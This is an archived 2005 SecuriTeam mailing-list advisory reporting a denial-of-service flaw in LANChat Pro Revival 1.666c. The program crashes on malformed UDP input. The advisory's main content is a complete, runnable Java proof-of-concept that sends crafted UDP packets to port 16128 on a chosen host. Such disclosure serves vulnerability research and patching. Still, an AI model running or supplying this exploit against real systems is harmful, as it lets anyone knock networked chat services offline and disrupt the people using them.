[NT] LANChat Pro Revival DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/05
- Previous message: SecuriTeam: "[EXPL] Vulnerability in OLE and COM Allows Remote Code Execution (Exploit, MS05-012)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 31 May 2005 17:08:03 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
LANChat Pro Revival DoS
------------------------------------------------------------------------
SUMMARY
" <http://lanchat.republika.pl/> LANChat Pro is a local area network chat
program with multicolor, custom skins and sounds support, WAN operation
and file transfer and many other options."
By suppling malformed UDP packets to LANChat Pro, a remote attacker can
cause the program to crash.
DETAILS
Vulnerable Systems:
* LANChat Pro Revival version 1.666c
LANChat Pro Revival does not filter the data received by UDP socket, and
wrong data will cause the program to crash.
Exploit:
/*
LANChat Pro Revival v1.666c - Denial Of Service - Proof Of Concept
Coded by: Donato Ferrante
*/
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
public class LANChatPR_1666c_DoS_poc {
final static String DATA = " ";
final static int PORT = 16128;
public static void main(String [] args){
credits();
if(args.length < 1)
usage();
int port;
try{
if(args.length > 1)
port = Integer.parseInt(args[1]);
else
port = PORT;
DatagramPacket packet = new DatagramPacket(DATA.getBytes(),
DATA.length(), InetAddress.getByName(args[0]), port);
DatagramSocket socket = new DatagramSocket();
int i = 0;
System.out.print("\nSending packets...");
while(i++ < 6)
socket.send(packet);
System.out.println(" [done]");
Thread.sleep(4500);
System.out.println("\nProof Of Concept terminated.\n\n");
}catch(Exception e){System.out.println(e);}
}
private static String VERSION = "0.1.0";
private static void credits(){
System.out.println("\n\nLANChat Pro Revival v1.666c - Denial Of Service
- Proof Of Concept\n");
System.out.println("Version " + VERSION );
System.out.println("coded by: Donato Ferrante");
System.out.println("e-mail: fdonato@autistici.org");
System.out.println("web: www.autistici.org/fdonato\n\n");
}
private static void usage(){
System.out.println("Usage: ");
System.out.println(" java LANChatPR_1666c_DoS_poc <host> [port]");
System.out.println(" [Default port is 16128]\n\n");
System.exit(-1);
}
}
/* EOF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:fdonato@autistici.org>
Donato Ferrante.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Vulnerability in OLE and COM Allows Remote Code Execution (Exploit, MS05-012)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
